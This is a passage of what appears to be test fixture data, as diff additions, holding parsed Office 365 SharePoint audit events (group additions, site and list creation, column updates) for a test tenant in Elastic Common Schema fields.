"https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 5631, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Members", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 6426, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "client.address": "20.190.143.50", + "client.ip": "20.190.143.50", + "event.action": "SiteCollectionCreated", + "event.category": "web", + "event.code": "SharePoint", + "event.dataset": "o365.audit", + "event.id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 7218, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Graph", + "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000", + "o365.audit.ClientIP": "20.190.143.50", + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "O365AdminCenterTrueFalse", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "o365.audit.ItemType": "Site", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "SiteCollectionCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 4, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "20.190.143.50", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "20.190.143.50", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 8147, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:55.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 8940, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:55", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListUpdated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 9732, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 0, + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.Operation": "ListUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListCreated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 10806, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "DocumentLibrary", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96CDFC22-2B86-49EA-B4E9-F11888B1665D", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/SiteAssets", + "o365.audit.Operation": "ListCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 11743, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 12834, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 13925, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 15016, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + 